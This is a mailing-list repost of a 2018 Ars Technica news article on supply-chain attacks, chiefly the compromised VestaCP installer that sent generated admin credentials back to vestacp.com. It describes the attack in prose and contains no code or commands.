[ISN] Two new supply-chain attacks come to light in less than a week

Wed, 24 Oct 2018 23:59:49 -0700 

https://arstechnica.com/information-technology/2018/10/two-new-supply-chain-attacks-come-to-light-in-less-than-a-week/

By DAN GOODIN
Ars Technica
10/23/2018
Most of us don't think twice about installing software or updates from a trusted developer. We scrutinize the source site carefully to make sure it’s legitimate, and then we let the code run on our computers without much more thought. As developers continue to make software and webpages harder to hack, blackhats over the past few years have increasingly exploited this trust to spread malicious wares. Over the past week, two such supply-chain attacks have come to light.
The first involves VestaCP, a control-panel interface that system administrators use to manage servers. This Internet scan performed by Censys shows that there are more than 132,000 unexpired TLS certificates protecting VestaCP users at the moment. According to a post published last Thursday by security firm Eset, unknown attackers compromised VestaCP servers and used their access to make a malicious change to an installer that was available for download. 


Poisoning the source
"The VestaCP installation script was altered to report back generated admin credentials to vestacp.com after a successful installation," Eset Malware Researcher Marc-Etienne M.Leveille told Ars. "We don’t know exactly when this happened, but the modified installation script was visible in their source code management on GitHub between May 31 and June 13." VestaCP developer Serghey Rodin told Ars his organization is working with Eset to investigate the breach to better understand the attack.
Until the investigation is complete, it remains unclear precisely how the compromise worked. Based on Leveille's initial findings, the hack most likely started by exploiting a critical vulnerability, either in the VestaCP software or a server used to distribute it, that gave the attackers root control. From there, the attackers added the password-sniffing functions to the installation source code. VestaCP software already contained code that sent statistical information from user servers to the vestacp.com website. 

[...]


--
Subscribe to InfoSec News
https://www.infosecnews.org/subscribe-to-infosec-news/
https://twitter.com/infosecnews_

Reply via email to